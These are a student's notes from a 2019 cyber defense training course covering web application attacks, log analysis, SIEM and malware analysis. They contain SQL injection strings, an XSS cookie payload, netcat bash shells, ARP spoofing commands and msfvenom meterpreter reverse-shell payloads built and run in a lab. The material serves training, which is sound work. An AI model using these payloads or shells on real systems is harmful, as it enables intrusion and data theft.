Advanced Cyber Defense Training Course

02-13 September 2019

Instructor: Alper Basaran(Tur)

Day 1: 02 September 2019; Web Application Security (1)

- Introduction:

NATO SPS program: Science for peace and security

Tubitak Turkish Company/Bilgem: Cyber Security Institute/lab

www.bilgem.tubitak.gov.tr

- TRL: Technology Readiness level

- Pardus: Linux customized Turkish OS.

- Teacher: Alper Basaran

- Attack vector for Client: USB/Web/MAIL

- Attack vector for server: running services

- Scan types: Manual, Automate, hybrid

Tools: ZAP, webscrab, w3af

ZAP:The OWASP Zed Attack Proxy (ZAP) is one of the world’s most popular free security tools and is
actively maintained by hundreds of international volunteers*. It can help you automatically find security
vulnerabilities in your web applications while you are developing and testing your applications. Its also a
great tool for experienced pentesters to use for manual security testing.

- Web Apps security: dvwa (admin/password and low level): Virtual Web application for testing web sites.

- Burpsuite(local proxy)

- CA you should block: DARK MATTER, UAE Global, Quo Vadis

- Netcraft: seeking DNS site

Black box testing: No match information IP@, URL

White box :testing:source code ,username, password

Grey box testing:compiles the two previous approaches: they test both the functionality and functioning of
a website.

Scan types: -manual

- Automated

- hybrid
OWASP
CWE™ is a community-developed list of common software security weaknesses. It serves as a
common language, a measuring stick for software security tools, and as a baseline for weakness
identification, mitigation, and prevention efforts

Some CA should be removed:dark matter ,UAE Global ,QUO vadis

OSINT (Open Source Intelligence)

* Google Operator:

Site: ... -site: ...

Inurl: ...

Filetype: ...

Intext: ...

* Google Hacking Database/Netcraft/shodan:it doesn’t show the user as an attacker

- Scan site:

Fierce -dns @ip

Nikto @ip : scan for miss-configuration in site

Nikto -h ‘’ http://www.defense.tn’’

nmap -sS @ip : SYN/SYN Response/Reset

Nmap -sV -p- @

Input/Output Validation

- SOP: Same origin policy is an important concept in the web security model

- Block list/white list

- Cross Side Scripting (XSS) Attack:

* Reflected XSS:

a/ Two Conditions Should be present to do it:

1- Reply for server should appear in source code

2- Forms should accept wild cards

b/ XSS id Threat to client

* Stored XSS (stored in the application using cookies)

Example:
 <script> alert(document.cookie)</script>

Python -m simpleHTTPServer 8888 : start web server listening in that port locally

Technologies and Standarts

URL, URI,URN

The Document Object Model (DOM) is a programming interface for HTML and XML documents. It represents the
page so that programs can change the document structure, style, and content. The DOM represents the document as
nodes and objects. That way, programming languages can connect to the page.

A CGI script is any program that runs on a web server.

HTTP Methods:

– GET– POST– PUT– DELETE– TRACE– OPTIONS– PATCH

End of The day.

Day 2: 03 September 2019; Web Application Security (2)

Terraform (Infrastructure as a service) used by cyberlab (Cloud and virtual environment),

OWASP: Open Source Web Application Security Project

- SQL Injection: use those

‘or 1=1

‘or 1=1 union select null, version()#

‘or 1=1 union select null, user()#

#Sqlmap -u “@” --cookie=”cookie value”

Cookie value: <script> alert(document.cookie)</script>

Sqlmap command line options:

# --dbs: show DB schema

# -a: show every possible things it find

# -D: select a specified database

# -T: show table schema

# --tables: show tables in database

# --dump: show table entry

- web application Firewall Detection tools: wafwoof

Wpscan -url ...

Netcat -v -e ‘/bin’bash’ -l 31337 : open connection on that port and execute a bash

Netcat -nv @ip 31337 : listen on that port

- Pentestmonkey.net (to download reverse shell script)

- Reverse Shell Execution

Steps

1- File upload to the server (XSS)

2- Call/execute it

3- Prepare the script (payload with msfconsol)

4- Open listener

*Details:

-Listener using netcat

#netcat: Nc -nlvp 1234

- Use of Meterpreter:
 Prepare the script

Msfvenom php/meterpreter/reverse_tcp lhost=@kali lport=choose_one -f raw

- Use msf:

#Msfconsole

#Use exploit/multi/handler

#Set LHOST @kali

#Set LPORT choose_one

#Set payload php/meterpreter/reverse_tcp

#Exploit

Then Process 1 to 3

-Authentification:

*Three way:

1- What you know(username,passwd)

2- What you have(credit card)

3- Who you are(feet print)

OTP: one time password

Brute force Attack:

- Use Burpsuite

- Action: send to the interpreter

- Edit the content and select the input you will use in attack

- Prepare a customized wordlists

- Start the attack

Howsecureismypassword.com :test my password

Day 3: 04 September 2019; Log Analysis (1)

Log Analysis

- Monitoring/Traffic Analysis

- Incident Response

- Threat Intelligence

- Forensics

- Malware Analysis

TTP: Tactics & Technics Procedures :how the attacker do?

IOC: Indicator of Compromise (using Register key, C&C IP,...)

HTTP Code:

- 1xx: Information

- 2xx: OK

- 3xx: Redirection

- 4xx: Client problem (error)

- 5xx: Response to client problem

Mitre Project

NIST Pentest

Web Log Analysis:

1- Find SQLMAP Attcck:

#Cat logfile | grep sqlmap | cut -d “ “ -f 1 | uniq >file

2- find IP address

#For i in $(cat file); do host $i; done

3- Whois

#For i in $(cat file); do whois $i; done

Use site VirusTotal

4 Find what else he dd?

#Cat logfile | grep @ip | grep -v sqlmap ..

Check for vulnerability: cvedetails.com

Other log Analysis Tools:

- Network Access: Packet fence

- ARP Poisoning
- DHCP Starvation Attack

- DOS/DDOS:

* Slowloris: DOS attack using configuration in browser (not the bandwidth)

* Slowloris-check:

Locate *.nse | grep slowloris

- Phishing Test: GoFish

Day 4: 05 September 2019; Log Analysis (2)

* Log Analysis (d2):

- list/count error log fo non existed file:

cat error.log | grep "File does not exist:" | wc -l

- list/count error log for username used in brute force attack:

cat error.log | grep -v File | grep "user" | cut -d "" -f 10 | uniq -c | sort -n

- list/count error log for directory traverse:

cat error.log | grep ("\/\.\.\/"|"%2E%2E")

* Network Analysis:

- Strategy for incident response:

Check the first component that start the alarm (AV/FW/Server/...)

It could be false positive

- Packet Capture and Analysis

* Whireshark (Graphical)

* Tcpdump: Command line for network analysis and sniffer

-i : interface

-n : escape DNS resolution

- IDS: Intrusion Detection System:

Software/Hardware solution

Types:

* By Location

Networdk based- IDS

Host-based IDS

* By Detection method

Signature-based

Anomaly-based

* By Packet processing

Stateful IDS

Static IDS

Snort IDS:
 Github hestat: snort rules free (snort community)

Network services:

HTTP: is using TCP

Service using UDP: DNS, VoIP, Syslog

* VPN: Virtual Private Network

IPSEC, PPP...

* FW Denied protocol from internet to internal: ICMP, RDP, RLOGIN, FTP, SMB,...

* FW Denied protocol from internal to internet: ICMP, IPSEC, DNS, HTTPS,...

Network Flow DATA :

process network flows explorted by router/network switching devices

Tools: Netflow, Sflow, IPfix, Nfsen, Nfdump, Flowbat

DNS Tunnel detection:

--/--/Brodsky-Darkhovsky

HTTP Packet Analysis:

Method: GET, HEAD, PUT, POST, DELETE, TRACE, CONNECT, OPTIONS

Server need to be configured to accept only GET and POST

Exercice:

1/ Trend in log_1

RPC scans

Snort-portmap-mountd-request-UDP

cat snort-alerts.txt | cut -d: -f5-7 | grep '^ [0-9]' | uniq -c | sort -n

* Bad Formated FW log file

* Check UTM format for FW log file

Check for Dropped IPs,

To well exploit UTM logs, You Should:

- have a while list for FW

- Do rules review

- Egress rules

- Geo-location

2/ Trend in log_2

To Check if it’s a botnet or not: if the attacker is using a fixed port to connect (TCP) everytime,
it’s a bot.
 Center of Inter Security (CIS) Benchmark: are best practices for the secure configuration of a
target OS system.

cat honeynet-Feb1_FebXX.log | cut -d "=" -f15 | cut -d "" -f 1 | sort | uniq -c | sort -n

* search most used Destination port

* or search by Source port and Filter by 4444 (metasploit port)

Cat honeynet-Feb1_FebXX.log | grep "SPT=4444"

The three types of testing are described here:

- Black Box: The tester has absolutely no knowledge of the system and is functioning in the same manner as an outside attacker.

- White Box: The tester has significant knowledge of the system. This simulates an attack from an insider—a rogue employee.

- Gray Box: This is a middle ground between the first two types of testing. In gray box testing, the tester has some limited
knowledge of the target system.
Day 5: 06 September 2019; Log Analysis (3)

Antivirus Log

Log file contents: Alarms, Update, Sessions events (user/admin)

Email Log Analysis

- Header Analyse:

Never connect width admin credentials (servers are in DMZ zone and could be hacked)

Should have a firewall rule for admin connection to servers

Get solution to check links in mail (when getting the mail and/or each time a user click on it)

Add-on: Privacy badger, Disconnect, Sandboxie

Emkei’s Mailer: fake mailer with attachments, encryption, HTML editor and advanced settings

Typosquatting (Fake URL similar to famous URL sites)

Dnstwister Report: Domaine name permutaion service

Windows Log Analysis

https://www.fortinet.com/blog/threat-research.html

Files analysis:

Automated(IOC, SIEM),

Semi-Automated (log analysis),

Manual (by-hand memory analysis, white list hash inquiry)

Should never install any program after an incident

Data Collection and Analysis tools:

GRR: Google Rapid Response (open source)

Linux, Mac, Windows support

Registry, File system, memory and process analysis

Mandiant Redline (free)

Malware risk index,

Registry, File system, memory and process analysis

IOC: Indicator of compromise (Traces that appear to be pointing to an intrusion with high confidence)

Standards: Open IOC, Sticks, IETF

Steps:

1 Creating IOC

2 IOC Integration
 3 Detection of suspicious

4 Evidence collection

5 Data analysis

6 Go back to Step1

IOC Editor: to create, edit and integrate IOC

IOC Finder: to search shared indicator

YARA rules (IPS rules): http://plusvic.github.io/yara

Windows Event Log

What? Where? When? How? Who? Why?

Some event id examples

Id 1100: Event log shut down (Before PC shut down)

Id 1101: Error

Id 1102: audit log cleared

Id 4608: PC start time

Id 4609: PC shut down time (Doesn’t appear in log because 1100 is closed before it)

Id 4616: Time change

Id 4946: FW rule added

Id 4948: FW rule deleted

Logon Type:

1- interactive (user is there)

2- Network

3- batch

4- service

5- Unlock

6- Network clear text

7- New credential

8- Remote interactive

9- Cached interactive

*Python-to-evtx: change windows log to files

-Linux Log:

*Places: /var/log, /var/log/messages, /var/log/syslog

*Syslog :
 *File Format: Timestamp, Hostname, App-Name, Priority (severity)

*www.sans.org: Online Cyber-Security Course

Incidence response checklist:

- Problem Nature?

- Problem initially detected? When? by whom?

- Security infrastructure components that exist in the environment? (FW, AV,...)

- Individuals aware about it?

- Primary incident response coordinator? (Tech lead, Admin Lead or Legal lead)

- Authorized to make business decision?

- Mechanisms that will be used to handle the incidents?

- Infrastructure affected and their security posture?

- Others security incidents observed on the affected environment?

- Possible ingress and egress points?

- Theories existed for how the initial compromise occurred?

- Analysis actions when qualifying the incident?

- Command or tools!!!,

- Measures to contain the scope of the incident?

Log Analysis Checklist:

- Identify log files you can use?

- Copy log record to single location?

- Minimize “noise” by removing useless log

- Determine whether you can rely on log

General Approach:

- Focus on recent changes, failures, errors, access and admin events

- Reconstruct action before and after the incident

- Correlate between different log services

- Develop theories about what occurred, explore logs to confirm or disprove them

Potential sec log Sources

- Server and workstation OS logs

- Applications logs

- Security tools log

- Outbound proxy
- Other non-log sources for security events (e.g who visited the sites, ...)

What to look for on net devices

- inbound/outbound activity

What to look for on events

- Detected attack activity

What to look for on web servers

- Failed access, error status

- Files accessed, types of files,...

Day 6: 07 September 2019; SIEM

SIEM Installation
Day 7: 09 September 2019; SIEM

TTP: Tactics and Technics protocols

Mitre Projects: https://attack.mitre.org/

SIEM Rules ressources: https://github.com/Neo23x0/sigma/tree/master/rules

Vulnerability scan tools:

Network Web application

Nessus Acunetix
Nexpose Netsparker
OpenVAs (free) VEGA (free)
*WAZUH / OSSEC

*Vulnerablity check methods : with credentials / without credentials

*Vulnerability Management Programs :(Plan to Update Vulnerability database)

*Vulnerability Scan steps:

- start the scans

- Results

- Review (chech false positive and false negative)

- Plan (how to correct them)

- Start the corrections,

- Check the corrections are completed successfully

- Vulnerability threat intelligence

- DO IT again from first step

Importants Tools/Tasks to have in your network:

- Patch Updates Management tools

- Third Party Software

- Check Previous Exploitation

 Day 8: 10 September 2019 SIEM

* Collecting Threat Intelligence:

- Tactical Intelligence

- Operational intelligence (who? why? how? : To build attacker profiles)

- Strategic intelligence (Long term)

- Log Shipping:

*Collect Log

*Centralize logs

Log prioritization:Low, Medium,High (serious)

High log should be encrypted when stored

Log Transport:

- Syslog UDP

- Syslog TCP (low)

- encrypted syslog

- SOAP over HTTP

- SNMP

- Regular file transfer (FTPS or SCP)

OSSIM Hands-on

* Linux send Logs to OSSIM:

- TCP: Add ( *.* @IP:514) to file /etc/syslog.conf

* Windows send Logs to OSSIM:

- install OSSEC agent manager

SIEM Training Traffic Analysis

*Packet Analysis (.pcap)

* ARP Cache Poisoning:

# echo “1” > /proc/sys/net/ipv4/ip_forward

# arpspoof -i etho -t @my_ip -r @the_gateway

* Listening to traffic on network:

# tcpdump -vv -i eth0 tcp port 80

# tcpdump -n -vv -i eth0 tcp port 80 : Dont convert addresses

* Read PCAP File with tcpdump:

 # tcpdump -r capture.pcap

Or you can just open it with WireShark

Exercices

Samples:

-File samples/wrongdissec.pcapng

* Wireshark doesn’t understand how the packet is decoded, it decode it as TCP.

* The port used is 1492 (Google say FTP)

* Let’s change codation:

- right-click on the packet

- decode as

- change current to the correct protocol (FTP).

* Then Follow TCP Stream

Exercice 1: Wateing Hole Attack, Drive-By download

Day 9: 11 September 2019;Malware Analysis

www.av-test.org : Test antivirus

Exercice 3:

We found something abnormal in the Pcap files (IP address, URL and malware)

We use Google and virus-total to check them.

After that, those coming steps will help us to check our network (using security components).

AV IPS FW
URL
1st Step Nuclear EK malware IP
Sw-Flash
Check for who other Check if other devices
2nd Step Check Anitivirus
visited the URL connected to the IP

Research about the malware (what it Check Similar IP (Provider,

3rd Check similar URL
does, ...) same subnet,...)

* IPS doesn’t understand false positive signature

* Notification could come from IPS and AV, but no notification from FW

Monday check list

- Vulnerability Management

-Log management

Traffic Analysis

-Phishing test

-Penetration test

-thread Intelligence

what we have FW/IPS/AV

what we need : Siem,TAP”Terminal access Point”(trafic capture)

Malware Analysis

techniques :basic/Advanced,Static/Advanced

Type of Malware : Backdoor , botnet,downloader,Information-stealing malware,Launcher

,Rootkit ,Scareware ,Spam-sending malware,worm ,virus

After incident :we Should prepare IOC(Indicator of compromise)to put on the SIEM

static Malware analysis Steps to prepare IOC : (static analyses the malware )

1- Hash

# md5sum file

# sha256 file
 2- Virus total

3- Strings (search for Ips/URLs/other) : print the strings of printable characters in files.

# Strings file

# strings -n 10 file : strings that length is more the 10 characters

#String file | grep -E -o “([0-9]{1,3}[\.]){3}[0-9]{1,3}”

4- PEiD : detects most common packers, cryptors and compilers for PE files.

5- Dependency Walker(ldd for linux library):free windows tool used to scan any
windows file(exe,dll…) and build a hierarchical tree diagram of all dependency
module(dll,exe…)

Dependency Walker function

-Accept/connect/ControlService/CheckRemote

-CreateMutex(mutual exclusion : to not run the malware more then one time)

-inet_addr,internetOpen,intenetOpenUrl

-NetScheduelJobAdd,NetShareEnum

Dynamic Malware analysis

6- TCP Viewer

7- Process Explorer

8- Process Monitor
Day 10: 12 September 2019; Malware Analysis

Dynamic Malware Analysis

For that, We will create our malware and work on it

Steps:

1- Create Malware Using kali:

#msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=Kali_Ip Lport = 7777 -f exe > malware.exe

2- Analyse:

Create web site in kali to listen on any http connection to kali

#python -m SimpleHTTPServer 8888

#use exploit/multi/handler

#set lhost=Kali_Ip

#set lport=7777

# exploit

3- Infect Windows

- Navigate to the Kali Address with the address of Kali And download the malware.exe

- Launch Malware.exe from Windows

4- Behavior Analysis:

Use those tools to follow the behavior for the malware and its actions(connections,exe files, dll files)

*TCPViewer : check for outgoing Connections, Strange IP address

*Tcp_Explorer :Search for processes without Company name

*Process-Monitor :

-Check Changes in processes:

- Check processes path

- Check process name(ScVhost,ScVHost,ScVhost…..)

*Malware types:

Staged Not Staged

hash Different Different

Virus totla Different Different

Stings Different equal

* Staged:the malware need to be started by the victim

 *Threat Hunting:

- Active Cyber defense activity. It is "the process of proactively and iteratively searching through networks to
detect and isolate advanced threats that evade existing security solutions.

- Anatomy of a Cyberattack

* Research

* Penetration

* Expand

* Exploit

- Block Traffic by Country (Russia, Ukraine, Serbia, Bulgaria, Romania, India,I ran, Israel,…)

- Should have an Internal firewall to log Events/Connections between subnets

- Indicators of a Cyberattack:

*outbound netwwork traffic

*Anomalies in Privieged User aAccount Activity

*Geographical Irregularities

*Log-in Irregularites and failures,

*HTML response size

*Mismatched port-application traffic

*suspicious registry acivity

-Threat Hunter Mo:

* Initial

*Minimal

*Procedural

*Innovative

*Leading

-Dumpster Fire(Python tools) : generate IOC to simulate events of attacks .

-Threat Hunter Techniques

*searching(IOC+Gateway log)

*……………………..